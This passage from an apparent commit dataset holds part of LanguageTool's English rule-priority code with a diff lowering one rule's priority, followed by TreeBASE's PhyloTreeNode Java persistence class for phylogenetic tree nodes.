"CHILDISH_LANGUAGE": return 8; // prefer over spell checker case "RUDE_SARCASTIC": return 6; // prefer over spell checker case "FOR_NOUN_SAKE": return 6; // prefer over PROFANITY (e.g. "for fuck sake") case "YEAR_OLD_HYPHEN": return 6; // higher prio than MISSING_HYPHEN case "MISSING_HYPHEN": return 5; case "TRANSLATION_RULE": return 5; // Premium case "WRONG_APOSTROPHE": return 5; case "DOS_AND_DONTS": return 3; case "EN_COMPOUNDS": return 2; case "ABBREVIATION_PUNCTUATION": return 2; case "FEDEX": return 2; // higher prio than many verb rules (e.g. MD_BASEFORM) case "LIFE_COMPOUNDS": return 1; case "DRIVE_THROUGH_HYPHEN": return 1; // higher prio than agreement rules case "CAUSE_COURSE": return 1; // higher prio than CAUSE_BECAUSE case "AN_AND": return 1; // higher prio than A_MY and DT_PRP case "HER_S": return 1; // higher prio than THEIR_S case "COVID_19": return 1; case "OTHER_WISE_COMPOUND": return 1; case "ON_EXCEL": return 1; case "IF_VB_PCT": return 1; // higher prio than IF_VB case "CAUSE_BECAUSE": return 1; // higher prio than MISSING_TO_BETWEEN_BE_AND_VB case "MAY_MANY": return 1; // higher prio than MAY_MANY_MY case "BOUT_TO": return 1; // higher prio than PRP_VB case "HAVE_HAVE": return 1; // higher prio than HE_D_VBD case "LUV": return 1; // higher prio than spell checker case "DAT": return 1; // higher prio than spell checker case "MAC_OS": return 1; // higher prio than spell checker case "BESTEST": return 1; // higher prio than spell checker case "OFF_OF": return 1; // higher prio than ADJECTIVE_ADVERB case "SHELL_COMPOUNDS": return 1; // higher prio than HELL case "HANDS_ON_HYPHEN": return 1; // higher prio than A_NNS case "QUIET_QUITE": return 1; // higher prio than A_QUITE_WHILE case "A_OK": return 1; // prefer over A_AN case "I_A": return 1; // higher prio than I_IF case "GOT_GO": return 1; // higher prio than MD_BASEFORM case "THERE_FORE": return 1; // higher prio than FORE_FOR case "PRP_NO_VB": return 1; // higher prio than I_IF case "FOLLOW_UP": return 1; // higher prio than MANY_NN case "IT_SOMETHING": return 1; // higher prio than IF_YOU_ANY and IT_THE_PRP case "NO_KNOW": return 1; // higher prio than DOUBLE_NEGATIVE case "WILL_BASED_ON": return 1; // higher prio than MD_BASEFORM / PRP_PAST_PART case "DON_T_AREN_T": return 1; // higher prio than DID_BASEFORM case "WILL_BECOMING": return 1; // higher prio than MD_BASEFORM case "WOULD_NEVER_VBN": return 1; // higher prio than MD_BASEFORM case "MD_APPRECIATED": return 1; // higher prio than MD_BASEFORM case "MONEY_BACK_HYPHEN": return 1; // higher prio than A_UNCOUNTABLE case "WORLDS_BEST": return 1; // higher prio than THE_SUPERLATIVE case "STEP_COMPOUNDS": return 1; // higher prio than STARS_AND_STEPS case "WON_T_TO": return 1; // higher prio than DON_T_AREN_T case "WAN_T": return 1; // higher prio than DON_T_AREN_T case "THE_US": return 1; // higher prio than DT_PRP case "THE_IT": return 1; // higher prio than DT_PRP case "THANK_YOU_MUCH": return 1; // higher prio than other rules case "TO_DO_HYPHEN": return 1; // higher prio than other rules case "A_NUMBER_NNS": return 1; // higher prio than A_NNS case "A_HUNDREDS": return 1; // higher prio than A_NNS case "NOW_A_DAYS": return 1; // higher prio than A_NNS case "COUPLE_OF_TIMES": return 1; // higher prio than A_NNS case "A_WINDOWS": return 1; // higher prio than A_NNS case "A_SCISSOR": return 1; // higher prio than A_NNS case "A_SNICKERS": return 1; // higher prio than A_NNS case "ROUND_A_BOUT": return 1; // higher prio than A_NNS case "A_NNS_BEST_NN": return 1; // higher prio than A_NNS case "A_BACHELORS_IN": return 1; // higher prio than A_NNS case "NEITHER_NOR": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "FOR_AWHILE": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "A_BUT": return 1; // higher prio than COMMA_COMPOUND_SENTENCE case "MAY_BE": return 1; // higher prio than IS_IT_MAY (premium rule) case "BORN_IN": return 1; // higher prio than PRP_PAST_PART case "DO_TO": return 1; // higher prio than HAVE_PART_AGREEMENT case "CURIOS_CURIOUS": return 1; // higher prio than A_NNS and POSSESSIVE_APOSTROPHE case "INCORRECT_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "THIS_YEARS_POSSESSIVE_APOSTROPHE": return 1; // higher prio than THIS_NNS case "SPURIOUS_APOSTROPHE": return 1; // higher prio than THIS_NNS case "IN_THIS_REGARDS": return 1; // higher prio than THIS_NNS case "NO_WHERE": return 1; // higher prio than NOW case "APOSTROPHE_VS_QUOTE": return 1; // higher prio than EN_QUOTES case "COMMA_PERIOD": return 1; // higher prio than COMMA_PARENTHESIS_WHITESPACE case "HERE_HEAR": return 1; // higher prio than ENGLISH_WORD_REPEAT_RULE case "LIGATURES": return 1; // prefer over spell checker case "APPSTORE": return 1; // prefer over spell checker case "INCORRECT_CONTRACTIONS": return 1; // prefer over EN_CONTRACTION_SPELLING case "DONT_T": return 1; // prefer over EN_CONTRACTION_SPELLING case "WHATS_APP": return 1; // prefer over EN_CONTRACTION_SPELLING case "NON_STANDARD_COMMA": return 1; // prefer over spell checker case "NON_STANDARD_ALPHABETIC_CHARACTERS": return 1; // prefer over spell checker case "WONT_CONTRACTION": return 1; // prefer over WONT_WANT case "YOU_GOOD": return 1; // prefer over PRP_PAST_PART case "THAN_THANK": return 1; // prefer over THAN_THEN case "CD_NN_APOSTROPHE_S": return 1; // prefer over CD_NN and LOWERCASE_NAME_APOSTROPHE_S case "IT_IF": return 1; // needs higher prio than PRP_COMMA and IF_YOU_ANY case "FINE_TUNE_COMPOUNDS": return 1; // prefer over less specific rules case "WHAT_IS_YOU": return 1; // prefer over HOW_DO_I_VB, NON3PRS_VERB case "SUPPOSE_TO": return 1; // prefer over HOW_DO_I_VB case "SEEN_SEEM": return 1; // prefer over PRP_PAST_PART case "PROFANITY": return 1; // prefer over spell checker (less prio than EN_COMPOUNDS) case "THE_THEM": return 1; // prefer over TO_TWO case "THERE_THEIR": return 1; // prefer over GO_TO_HOME case "IT_IS_DEPENDING_ON": return 1; // prefer over PROGRESSIVE_VERBS case "IRREGARDLESS": return 1; // prefer over spell checker case "WANNA": return 1; // prefer over spell checker case "LOOK_FORWARD_TO": return 1; // prefer over LOOK_FORWARD_NOT_FOLLOWED_BY_TO case "LOOK_SLIKE": return 1; // higher prio than prem:SINGULAR_NOUN_VERB_AGREEMENT case "ANYWAYS": return -1; // higher prio than spell checker case "MISSING_GENITIVE": return -1; // prefer over spell checker (like EN_SPECIFIC_CASE) case "EN_UNPAIRED_BRACKETS": return -1; // less priority than rules that suggest the correct brackets case "NEEDS_FIXED": return -1; // less priority than MISSING_TO_BEFORE_A_VERB case "BLACK_SEA": return -1; // less priority than SEA_COMPOUNDS case "A_TO": return -1; // less priority than other rules that offer suggestions case "MANY_NN": return -1; // less priority than PUSH_UP_HYPHEN, SOME_FACULTY case "WE_BE": return -1; case "A_LOT_OF_NN": return -1; case "IT_VBZ": return -1; case "ORDER_OF_WORDS_WITH_NOT": return -1; // less prio than punctuation rules case "ADVERB_WORD_ORDER_10_TEMP": return 1; case "ADVERB_WORD_ORDER": return -1; // less prio than PRP_PAST_PART // case "IT_IS_2": return -1; // needs higher prio than BEEN_PART_AGREEMENT case "A_RB_NN": return -1; // prefer other more specific rules (e.g. QUIET_QUITE, A_QUITE_WHILE) case "DT_RB_IN": return -1; // prefer other more specific rules case "VERB_NOUN_CONFUSION": return -1; // prefer other more specific rules case "NOUN_VERB_CONFUSION": return -1; // prefer other more specific rules case "PLURAL_VERB_AFTER_THIS": return -1; // prefer other more specific rules (e.g. COMMA_TAG_QUESTION) case "BE_RB_BE": return -1; // prefer other more specific rules case "IT_ITS": return -1; // prefer other more specific rules case "ENGLISH_WORD_REPEAT_RULE": return -1; // prefer other more specific rules (e.g. IT_IT) case "PRP_MD_NN": return -1; // prefer other more specific rules (e.g. MD_ABLE, WONT_WANT) case "NON_ANTI_PRE_JJ": return -1; // prefer other more specific rules case "DT_JJ_NO_NOUN": return -1; // prefer other more specific rules (e.g. THIRD_PARTY) case "AGREEMENT_SENT_START": return -1; // prefer other more specific rules case "HAVE_PART_AGREEMENT": return -1; // prefer other more specific rules case "PREPOSITION_VERB": return -1; // prefer other more specific rules case "EN_A_VS_AN": return -1; // prefer other more specific rules (with suggestions, e.g. AN_ALSO) case "CD_NN": return -1; // prefer other more specific rules (with suggestions) case "ATD_VERBS_TO_COLLOCATION": return -1; // prefer other more specific rules (with suggestions) case "ADVERB_OR_HYPHENATED_ADJECTIVE": return -1; // prefer other more specific rules (with suggestions) case "GOING_TO_VBD": return -1; // prefer other more specific rules (with suggestions, e.g. GOING_TO_JJ) case "MISSING_PREPOSITION": return -1; // prefer other more specific rules (with suggestions) case "BE_TO_VBG": return -1; // prefer other more specific rules (with suggestions) case "NON3PRS_VERB": return -1; // prefer other more specific rules (with suggestions, e.g. DONS_T) case "DID_FOUND_AMBIGUOUS": return -1; // prefer other more specific rules (e.g. TWO_CONNECTED_MODAL_VERBS) case "BE_I_BE_GERUND": return -1; // prefer other more specific rules (with suggestions) case "VBZ_VBD": return -1; // prefer other more specific rules (e.g. IS_WAS) case "SUPERLATIVE_THAN": return -1; // prefer other more specific rules case "UNLIKELY_OPENING_PUNCTUATION": return -1; // prefer other more specific rules case "METRIC_UNITS_EN_IMPERIAL": return -1; // prefer MILE_HYPHEN case "METRIC_UNITS_EN_GB": return -1; // prefer MILE_HYPHEN case "COMMA_COMPOUND_SENTENCE": return -1; // prefer other rules case "COMMA_COMPOUND_SENTENCE_2": return -1; // prefer other rules case "REPEATED_VERBS": return -1; // prefer other rules case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) case "PRP_VB": return -2; // prefer other more specific rules (with suggestions) case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) case "HE_VERB_AGR": return -3; // prefer other more specific rules (e.g. PRP_VBG) case "PRP_JJ": return -3; // prefer other rules (e.g. PRP_VBG, IT_IT and ADJECTIVE_ADVERB, PRP_ABLE, PRP_NEW, MD_IT_JJ) case "PRONOUN_NOUN": return -3; // prefer other rules (e.g. PRP_VB, PRP_JJ) case "INDIAN_ENGLISH": return -3; // prefer grammar rules, but higher prio than spell checker case "GONNA_TEMP": return -3; case "PRP_THE": return -4; // prefer other rules (e.g. I_A, PRP_JJ, IF_YOU_ANY, I_AN) case "GONNA": return -4; // prefer over spelling rules case "WHATCHA": return -4; // prefer over spelling rules case "DONTCHA": return -4; // prefer over spelling rules case "GOTCHA": return -4; // prefer over spelling rules case "OUTTA": return -4; // prefer over spelling rules case "Y_ALL": return -4; // prefer over spelling rules case "GIMME": return -4; // prefer over spelling rules case "LEMME": return -4; // prefer over spelling rules case "MORFOLOGIK_RULE_EN_US": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_GB": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_CA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_ZA": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority case "TWO_CONNECTED_MODAL_VERBS": return -15; case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections. case "AI_HYDRA_LEO_MISSING_COMMA": return -51; // prefer comma style rules. case "SENTENCE_FRAGMENT_SINGLE_WORDS": return -51; // prefer other more important sentence start corrections. case "EN_REDUNDANCY_REPLACE": return -510; // style rules should always have the lowest priority. case "EN_PLAIN_ENGLISH_REPLACE": return -511; // style rules should always have the lowest priority. case "THREE_NN": return -600; // style rules should always have the lowest priority. case "SENT_START_NUM": return -600; // style rules should always have the lowest priority. case "PASSIVE_VOICE": return -600; // style rules should always have the lowest priority. case "EG_NO_COMMA": return -600; // style rules should always have the lowest priority. case "IE_NO_COMMA": return -600; // style rules should always have the lowest priority. case "REASON_WHY": return -600; // style rules should always have the lowest priority. case LongSentenceRule.RULE_ID: return -997; case LongParagraphRule.RULE_ID: return -998; } if (id.startsWith("CONFUSION_RULE_")) { return -20; } if (id.startsWith("AI_HYDRA_LEO")) { // prefer more specific rules (also speller) return -11; } if (id.startsWith("AI_EN_G_")) { // prefer more specific rules (also speller) return -21; } if (id.matches("EN_FOR_[A-Z]+_SPEAKERS_FALSE_FRIENDS.*")) { return -21; } return super.getPriorityForId(id); } @Override public Function<Rule, Rule> getRemoteEnhancedRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { Function<Rule, Rule> fallback = super.getRemoteEnhancedRules(messageBundle, configs, userConfig, motherTongue, altLanguages, inputLogging); RemoteRuleConfig bert = RemoteRuleConfig.getRelevantConfig(BERTSuggestionRanking.RULE_ID, configs); return original -> { if (original.isDictionaryBasedSpellingRule() && original.getId().startsWith("MORFOLOGIK_RULE_EN")) { if (bert != null) { return new BERTSuggestionRanking(this, original, bert, inputLogging); } } return fallback.apply(original); }; } @Override public List<Rule> getRelevantRemoteRules(ResourceBundle messageBundle, List<RemoteRuleConfig> configs, GlobalConfig globalConfig, UserConfig userConfig, Language motherTongue, List<Language> altLanguages, boolean inputLogging) throws IOException { List<Rule> rules = new ArrayList<>(super.getRelevantRemoteRules( messageBundle, configs, globalConfig, userConfig, motherTongue, altLanguages, inputLogging)); // no description needed - matches based on automatically created rules with descriptions provided by remote server rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_EN_", "INTERNAL - dynamically loaded rule supported by remote server")); rules.addAll(GRPCRule.createAll(this, configs, inputLogging, "AI_HYDRA_LEO", "INTERNAL - dynamically loaded rule supported by remote server")); return rules; } }
[en] adjust rule prio
languagetool-language-modules/en/src/main/java/org/languagetool/language/English.java
[en] adjust rule prio
<ide><path>anguagetool-language-modules/en/src/main/java/org/languagetool/language/English.java <ide> case "PRP_RB_NO_VB": return -2; // prefer other more specific rules (with suggestions) <ide> case "PRP_VBG": return -2; // prefer other more specific rules (with suggestions, prefer over HE_VERB_AGR) <ide> case "PRP_VBZ": return -2; // prefer other more specific rules (with suggestions) <del> case "PRP_VB": return -2; // prefer other more specific rules (with suggestions) <ide> case "BE_VBP_IN": return -2; // prefer over BEEN_PART_AGREEMENT <ide> case "BEEN_PART_AGREEMENT": return -3; // prefer other more specific rules (e.g. VARY_VERY, VB_NN) <ide> case "A_INFINITIVE": return -3; // prefer other more specific rules (with suggestions, e.g. PREPOSITION_VERB, THE_TO) <ide> case "MORFOLOGIK_RULE_EN_NZ": return -10; // more specific rules (e.g. L2 rules) have priority <ide> case "MORFOLOGIK_RULE_EN_AU": return -10; // more specific rules (e.g. L2 rules) have priority <ide> case "TWO_CONNECTED_MODAL_VERBS": return -15; <add> case "PRP_VB": return -25; // prefer other rules (with suggestions, e.g. confusion rules) <ide> case "WANT_TO_NN": return -25; // prefer more specific rules that give a suggestion <ide> case "QUESTION_WITHOUT_VERB": return -25; // prefer more specific rules that give a suggestion <ide> case "SENTENCE_FRAGMENT": return -50; // prefer other more important sentence start corrections.
Java
bsd-3-clause
6801ac17341daa70485e95453d65b23dd9219243
0
TreeBASE/treebase,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebasetest,TreeBASE/treebase
package org.cipres.treebase.domain.tree; import java.util.ArrayList; import java.util.List; import javax.persistence.AttributeOverride; import javax.persistence.CascadeType; import javax.persistence.Column; import javax.persistence.Entity; import javax.persistence.FetchType; import javax.persistence.JoinColumn; import javax.persistence.ManyToOne; import javax.persistence.OneToOne; import javax.persistence.Table; import javax.persistence.Transient; import org.hibernate.annotations.BatchSize; import org.hibernate.annotations.Cache; import org.hibernate.annotations.CacheConcurrencyStrategy; import org.hibernate.annotations.Index; import org.cipres.treebase.TreebaseUtil; import org.cipres.treebase.domain.AbstractPersistedObject; import org.cipres.treebase.domain.TBPersistable; import org.cipres.treebase.domain.taxon.TaxonLabel; /** * PhyloTreeNode.java * * The treebase implementation of a general tree node. * * Created on Mar 13, 2006 * * @author Jin Ruan * */ @Entity @Table(name = "PHYLOTREENODE") @AttributeOverride(name = "id", column = @Column(name = "PHYLOTREENODE_ID")) @Cache(usage = CacheConcurrencyStrategy.NONSTRICT_READ_WRITE, region = "treeCache") @BatchSize(size = 40) public class PhyloTreeNode extends AbstractPersistedObject implements TreeNode { private static final long serialVersionUID = 1L; private String mName; private Double mBranchLength; private int mNodeDepth; private long mLeftNode; private long mRightNode; private PhyloTree mTree; private PhyloTreeNode mChildNode; private PhyloTreeNode mSiblingNode; private NodeAttribute mNodeAttribute; private TaxonLabel mTaxonLabel; // used internally to navigate the inverse relationships. private PhyloTreeNode mParentNode; //private PhyloTreeNode mInverseChild; //private PhyloTreeNode mInverseSibling; /** * Constructor. */ public PhyloTreeNode() { super(); } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getNodeDepth() */ @Column(name = "nodeDepth", nullable = true) public int getNodeDepth() { return mNodeDepth; } /** * Set the nodeDepth field. */ public void setNodeDepth(int pNewnodeDepth) { mNodeDepth = pNewnodeDepth; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getBranchLength() */ @Column(name = "BranchLength", nullable = true) public Double getBranchLength() { return mBranchLength; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setBranchLength(java.lang.String) */ public void setBranchLength(Double pNewBranchLength) { mBranchLength = pNewBranchLength; } /** * Return true if the branch length is defined. * * @return */ public boolean hasBranchLength() { return getBranchLength() != null; } /** * Return the RightNode field. * * @return long mRightNode */ @Column(name = "RightNode", nullable = true) public long getRightNode() { return mRightNode; } /** * Set the RightNode field. */ public void setRightNode(long pNewRightNode) { mRightNode = pNewRightNode; } /** * Return the LeftNode field. * * @return long mLeftNode */ @Column(name = "LeftNode", nullable = true) public long getLeftNode() { return mLeftNode; } /** * Set the LeftNode field. */ public void setLeftNode(long pNewLeftNode) { mLeftNode = pNewLeftNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getName() */ @Column(name = "Name", length = TBPersistable.COLUMN_LENGTH_STRING) public String getName() { return mName; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setName(java.lang.String) */ public void setName(String pNewName) { mName = pNewName; } /** * Return the Tree field. * * @return PhyloTree */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PHYLOTREE_ID", nullable = false) @Index(name = "TNODE_TREE_IDX") public PhyloTree getTree() { return mTree; } /** * This is for internal use only. Use the public method PhyloTree.addNode() instead. */ protected void setTree(PhyloTree pNewTree) { mTree = pNewTree; } /** * Return the TaxonLabel field. * * @return TaxonLabel */ //Use eager fetch since the taxonlabel is always needed after loading a node. @ManyToOne(cascade = {CascadeType.PERSIST, CascadeType.MERGE}, fetch = FetchType.EAGER) @JoinColumn(name = "TAXONLABEL_ID", nullable = true) @Index(name = "TNODE_TAXLABEL_IDX") public TaxonLabel getTaxonLabel() { return mTaxonLabel; } /** * Set the TaxonLabel field. */ public void setTaxonLabel(TaxonLabel pNewTaxonLabel) { mTaxonLabel = pNewTaxonLabel; } /** * Get the TaxonLabel as a String. Return an empty string if the node has no taxon label. */ @Transient public String getTaxonLabelAsString() { if (getTaxonLabel() != null) { return getTaxonLabel().getTaxonLabel(); } return null; } /** * Get the TaxonLabel as a String. If empty return the node name. */ @Transient public String getTaxonLabelOrName() { String label = getTaxonLabelAsString(); if (TreebaseUtil.isEmpty(label)) { return getName(); } return label; } /** * Return the SibilingNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "SIBLING_ID", nullable = true) protected PhyloTreeNode getSiblingNode() { return mSiblingNode; } /** * Set the SibilingNode field. */ protected void setSiblingNode(PhyloTreeNode pNewSibilingNode) { mSiblingNode = pNewSibilingNode; } /** * Return the ChildNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "CHILD_ID", nullable = true) protected PhyloTreeNode getChildNode() { return mChildNode; } /** * Set the ChildNode field. */ protected void setChildNode(PhyloTreeNode pNewChildNode) { mChildNode = pNewChildNode; } // /** // * Return the InverseSibling field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "siblingNode", fetch= FetchType.LAZY) // protected PhyloTreeNode getInverseSibling() { // return mInverseSibling; // } // // /** // * Set the InverseSibling field. // */ // protected void setInverseSibling(PhyloTreeNode pNewInverseSibling) { // mInverseSibling = pNewInverseSibling; // } // // /** // * Return the InverseChild field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "childNode", fetch = FetchType.LAZY) // protected PhyloTreeNode getInverseChild() { // return mInverseChild; // } // // /** // * Set the InverseChild field. // */ // protected void setInverseChild(PhyloTreeNode pNewInverseChild) { // mInverseChild = pNewInverseChild; // } // /** * * @see org.cipres.treebase.domain.tree.TreeNode#isRootNode() */ @Transient public boolean isRootNode() { return getParentNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#isLeaf() */ @Transient public boolean isLeaf() { return getChildNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getParentNode() */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PARENT_ID", nullable = true) public PhyloTreeNode getParentNode() { return mParentNode; } /** * This is for internal use only. Use the public methods addChildNode() * or PhyloTree.addNode() instead. */ protected void setParentNode(PhyloTreeNode pParentNode) { mParentNode = pParentNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#addChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public void addChildNode(TreeNode pChild) { if (pChild == null || !(pChild instanceof PhyloTreeNode)) { return; } PhyloTreeNode bChild = (PhyloTreeNode) pChild; bChild.setParentNode(this); getTree().addTreeNode(bChild); if (getChildNode() == null) { setChildNode(bChild); } else { getChildNode().addSiblingNode(bChild); } } /** * Add a sibling node. This method does not set the parent node. It is done * by addChildNode(). * * @param pSibling */ private void addSiblingNode(PhyloTreeNode pSibling) { if (pSibling == null) { return; } if (getSiblingNode() == null) { setSiblingNode(pSibling); //Note: this is a private method so we don't need to call the following: //pSibling.setParentNode(this.getParentNode()); } else { getSiblingNode().addSiblingNode(pSibling); } } /** * * @see org.cipres.treebase.domain.tree.TreeNode#RemoveChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public boolean removeChildNode(TreeNode pChild) { if (pChild == null || getChildNode() == null || !(pChild instanceof PhyloTreeNode)) { return false; } //Note: remove a child node, ADD all the sub node from this child node. // So actually a clad is removed. PhyloTreeNode bChild = (PhyloTreeNode) pChild; boolean removed = false; if (getChildNode() == bChild) { PhyloTreeNode nextChild = bChild.getSiblingNode(); // if (nextChild != null) { // nextChild.setInverseChild(this); // nextChild.setInverseSibling(null); // } setChildNode(nextChild); bChild.setParentNode(null); removed = true; } else { removed = getChildNode().removeSibling(bChild); } return removed; } /** * Remove a sibling node. * * @param pSibling * @return true if the node is found and removed */ private boolean removeSibling(PhyloTreeNode pSibling) { if (pSibling == null || getSiblingNode() == null) { return false; } boolean removed = false; if (getSiblingNode() == pSibling) { PhyloTreeNode nextSibling = pSibling.getSiblingNode(); // if (nextSibling != null) { // nextSibling.setInverseSibling(this); // } setSiblingNode(nextSibling); // pSibling.setInverseChild(null); // pSibling.setInverseSibling(null); pSibling.setSiblingNode(null); pSibling.setParentNode(null); removed = true; } else { removed = getSiblingNode().removeSibling(pSibling); } return removed; } /** * Return the NodeAttribute field. * * @return NodeAttribute */ @ManyToOne(cascade = CascadeType.ALL, fetch = FetchType.LAZY) @JoinColumn(name = "NODEATTRIBUTE_ID", nullable = true) public NodeAttribute getNodeAttribute() { return mNodeAttribute; } /** * Set the NodeAttribute field. */ public void setNodeAttribute(NodeAttribute pNewNodeAttribute) { mNodeAttribute = pNewNodeAttribute; } /** * Return all the children for this node. * * @return */ @Transient public List<PhyloTreeNode> getChildNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode child = getChildNode(); if (child != null) { nodes.add(child); PhyloTreeNode sibling = child.getSiblingNode(); while (sibling != null) { nodes.add(sibling); sibling = sibling.getSiblingNode(); } } return nodes; } /* * TODO: In an annotated tree, there is a more efficient way to do this. * Simply select every node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.rightNode > this.rightNode * * To get them in order, simply sort by leftNode value; the least leftNode is the root, and the * greatest is the parent. To include this node itself, change < and > to <= and >=. */ /** * @return the list of nodes that are ancestors of this one, in order with the root last */ @Transient List<PhyloTreeNode> getAncestorNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode cur; for (cur = (PhyloTreeNode) this.getParentNode(); cur != null; cur = (PhyloTreeNode) cur.getParentNode()) { nodes.add(cur); } return nodes; } /** * Annotate the leftNode and rightNode members of this node and * all its child nodes in the tree. Afterwards, every node in the subtree rooted here * will have the following properties: * a.leftNode < b.leftNode < b.rightNode < a.rightNode whenever b is a child of a * (a.rightNode - a.leftNode + 1)/2 is the size of the tree rooted at a * * @param start The leftNode value that should be assigned to this node * @return The rightNode value that was assigned to this node * @author mjd */ public long updateSubtreeBounds(long start) { this.setLeftNode(start); for (PhyloTreeNode c : this.getChildNodes()) { start = c.updateSubtreeBounds(start+1); } this.setRightNode(start+1); return start+1; } /** * @return True if and only if the leftNode and rightNode elements have been set * @author mjd */ @Transient public boolean hasSubtreeBounds() { return this.getLeftNode() != 0 && this.getRightNode() != 0; } /** * * @param that some other node in the same tree * @return whether this node is an ancestor of that node * @author mjd */ public boolean isAncestorOf(PhyloTreeNode that) { return this.getLeftNode() < that.getLeftNode() && that.getRightNode() < this.getRightNode(); } /** * * @param that some other node in the same tree * @return whether this node is a descdendant of that node * @author mjd */ public boolean isDescendantOf(PhyloTreeNode that) { return that.isAncestorOf(this); } /** * * TODO: in an annotated tree, there is a much better way to do this. * we can do a single Hibernate query that selects the first node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.leftNode < that.leftNode * 3. N.rightNode > this.rightNode * 4. N.rightNode > that.rightNode * 6. order descending by this.leftNode */ /** * @param that some other node in the same tree * @return the lowest node in the chain of common ancestors of this node and that */ public PhyloTreeNode nearestCommonAncestor(PhyloTreeNode that) { for (PhyloTreeNode p : this.getAncestorNodes()) { if (p.isAncestorOf(that)) { return p; } } return null; // This should never happen } /* TODO: as with the methods above, there is an abbreviation for this when the tree is annotated */ /** * * @param n1 another node in the same tree * @param n2 another node in the same tree * @return whether n1 and n2 are more closely related to each other than either is to this node */ public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); } @Override @Transient public String getLabel() { return getTaxonLabelAsString(); } }
treebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java
package org.cipres.treebase.domain.tree; import java.util.ArrayList; import java.util.List; import javax.persistence.AttributeOverride; import javax.persistence.CascadeType; import javax.persistence.Column; import javax.persistence.Entity; import javax.persistence.FetchType; import javax.persistence.JoinColumn; import javax.persistence.ManyToOne; import javax.persistence.OneToOne; import javax.persistence.Table; import javax.persistence.Transient; import org.hibernate.annotations.BatchSize; import org.hibernate.annotations.Cache; import org.hibernate.annotations.CacheConcurrencyStrategy; import org.hibernate.annotations.Index; import org.cipres.treebase.TreebaseUtil; import org.cipres.treebase.domain.AbstractPersistedObject; import org.cipres.treebase.domain.TBPersistable; import org.cipres.treebase.domain.taxon.TaxonLabel; /** * PhyloTreeNode.java * * The treebase implementation of a general tree node. * * Created on Mar 13, 2006 * * @author Jin Ruan * */ @Entity @Table(name = "PHYLOTREENODE") @AttributeOverride(name = "id", column = @Column(name = "PHYLOTREENODE_ID")) @Cache(usage = CacheConcurrencyStrategy.NONSTRICT_READ_WRITE, region = "treeCache") @BatchSize(size = 40) public class PhyloTreeNode extends AbstractPersistedObject implements TreeNode { private static final long serialVersionUID = 1L; private String mName; private Double mBranchLength; private int mNodeDepth; private long mLeftNode; private long mRightNode; private PhyloTree mTree; private PhyloTreeNode mChildNode; private PhyloTreeNode mSiblingNode; private NodeAttribute mNodeAttribute; private TaxonLabel mTaxonLabel; // used internally to navigate the inverse relationships. private PhyloTreeNode mParentNode; //private PhyloTreeNode mInverseChild; //private PhyloTreeNode mInverseSibling; /** * Constructor. */ public PhyloTreeNode() { super(); } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getNodeDepth() */ @Column(name = "nodeDepth", nullable = true) public int getNodeDepth() { return mNodeDepth; } /** * Set the nodeDepth field. */ public void setNodeDepth(int pNewnodeDepth) { mNodeDepth = pNewnodeDepth; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getBranchLength() */ @Column(name = "BranchLength", nullable = true) public Double getBranchLength() { return mBranchLength; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setBranchLength(java.lang.String) */ public void setBranchLength(Double pNewBranchLength) { mBranchLength = pNewBranchLength; } /** * Return true if the branch length is defined. * 